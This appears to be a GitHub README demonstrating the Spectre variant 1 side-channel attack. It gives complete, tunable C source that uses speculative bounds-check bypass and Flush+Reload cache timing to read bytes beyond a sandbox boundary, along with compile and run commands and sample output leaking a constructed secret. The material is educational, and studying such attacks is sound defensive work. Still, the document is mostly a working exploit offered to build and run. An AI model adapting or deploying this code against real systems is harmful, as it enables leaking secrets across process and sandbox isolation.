ericghara / spectre_vulnerability

Demo of the Spectre side channel attack


Spectre Vulnerability

I took a deep dive reading about this vulnerability and ended up discovering a great lab describing the exploit. This demo shows how, even in a sandboxed environment, an in-process memory read outside of the sandbox is possible: a bounds check that is architecturally respected is still speculatively bypassed, and the out-of-bounds value leaves a footprint in the cache that a timing measurement recovers. This attack was tuned for an Intel Haswell CPU on a 5.15.59 kernel.

Update: This style of attack was totally ineffective against an AMD Ryzen 5700 on a 5.15.80 kernel.
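The mechanism described above, as an added example that is not the repository's SpectreAttack.c: a minimal Spectre variant 1 (bounds-check bypass) read built on Flush+Reload, in the style of the Kocher et al. proof of concept. All names, the constructed secret string, the probe stride and the cache-hit threshold of 80 cycles are assumptions; the threshold in particular has to be tuned per machine.

```c
/* Added example, not the repository's SpectreAttack.c: Spectre v1 read via
 * Flush+Reload. Constructed secret, names and the 80-cycle threshold are
 * assumptions; on non-x86 it compiles but cannot leak (no clflush/rdtscp). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define FLUSH(p) _mm_clflush(p)
static inline uint64_t cycles(unsigned *aux) { return __rdtscp(aux); }
#else
#include <time.h>
#define FLUSH(p) ((void)(p))
static inline uint64_t cycles(unsigned *aux) {
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts); *aux = 0;
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

#define STRIDE 4096            /* one page per probe line: defeats adjacent-line prefetch */
#define CACHE_HIT_THRESHOLD 80 /* assumed cycles; tune to the CPU under test */

unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * STRIDE];  /* probe array: which line gets touched encodes the byte */
const char *secret = "Some Secret Value";  /* constructed secret, outside array1's bounds */
uint8_t temp = 0;              /* keeps the compiler from dropping the probe load */

/* The "sandboxed" read: architecturally safe, but the branch is predicted. */
__attribute__((noinline)) void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * STRIDE];
}

/* Branch-free index choice for iteration j: five training runs with a valid
 * index, then one attack run. No branch on j means no extra predictor noise. */
size_t select_index(int j, size_t training_x, size_t malicious_x) {
    size_t x = (size_t)(((j % 6) - 1) & ~0xFFFF);
    x = x | (x >> 16);          /* all ones when j % 6 == 0, else zero */
    return training_x ^ (x & (malicious_x ^ training_x));
}

/* Index of the highest score; ties go to the lowest byte value. */
int best_guess(const int score[256]) {
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (score[i] > score[best]) best = i;
    return best;
}

/* Leak the byte at array1 + malicious_x. Fills score[] and returns the best guess. */
int read_memory_byte(size_t malicious_x, int score[256]) {
    memset(score, 0, 256 * sizeof(int));
    for (int tries = 999; tries > 0; tries--) {
        for (int i = 0; i < 256; i++) FLUSH(&array2[i * STRIDE]);  /* evict probe lines */
        size_t training_x = (size_t)tries % array1_size;
        for (int j = 29; j >= 0; j--) {
            FLUSH(&array1_size);                       /* bounds check must wait on memory */
            for (volatile int z = 0; z < 100; z++) {}  /* let the flush land */
            victim_function(select_index(j, training_x, malicious_x));
        }
        /* Reload phase: a fast read means array2[v * STRIDE] was speculatively touched. */
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;        /* scrambled order vs. stride prefetch */
            volatile uint8_t *addr = &array2[mix_i * STRIDE];
            unsigned junk;
            uint64_t t1 = cycles(&junk);
            junk = *addr;
            uint64_t dt = cycles(&junk) - t1;
            if (dt <= CACHE_HIT_THRESHOLD && mix_i != array1[training_x])
                score[mix_i]++;                        /* ignore the training value's line */
        }
    }
    return best_guess(score);
}

int main(void) {
    size_t malicious_x = (size_t)((uintptr_t)secret - (uintptr_t)array1);
    size_t len = strlen(secret);
    int score[256];
    printf("Reading %zu bytes at array1 + %zu\n", len, malicious_x);
    for (size_t i = 0; i < len; i++) {
        int v = read_memory_byte(malicious_x + i, score);
        printf("Char %2zu: 0x%02x '%c' (score %d)\n", i, v,
               (v > 31 && v < 127) ? v : '?', score[v]);
    }
    return 0;
}
```

Build it the same way as the repository's demo (`gcc -march=native`), ideally at -O0 so the compiler does not hoist the bounds check. If every byte comes back with a score of 0 the threshold is too low for the machine; if most of the 256 lines score on every try it is too high. Measure a known cached and a known flushed read first and set CACHE_HIT_THRESHOLD between them.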

Compile

gcc -march=native -o SpectreAttack SpectreAttack.c

Run

./SpectreAttack

Representative Output

Secret: Some Secret Value

Possibilites for Char 0
'S'
Possibilites for Char 1
'o'
Possibilites for Char 2
'm'
Possibilites for Char 3
'e'
Possibilites for Char 4
' '
Possibilites for Char 5
'S'
Possibilites for Char 6
'e'
Possibilites for Char 7
'c'
Possibilites for Char 8
'r'
Possibilites for Char 9
'e'
Possibilites for Char 10
't'
Possibilites for Char 11
' '
Possibilites for Char 12
'V'
Possibilites for Char 13
'a'
Possibilites for Char 14
'l'
Possibilites for Char 15
'u'
Possibilites for Char 16
'e'

*Results are most reliable after 3 consecutive runs.
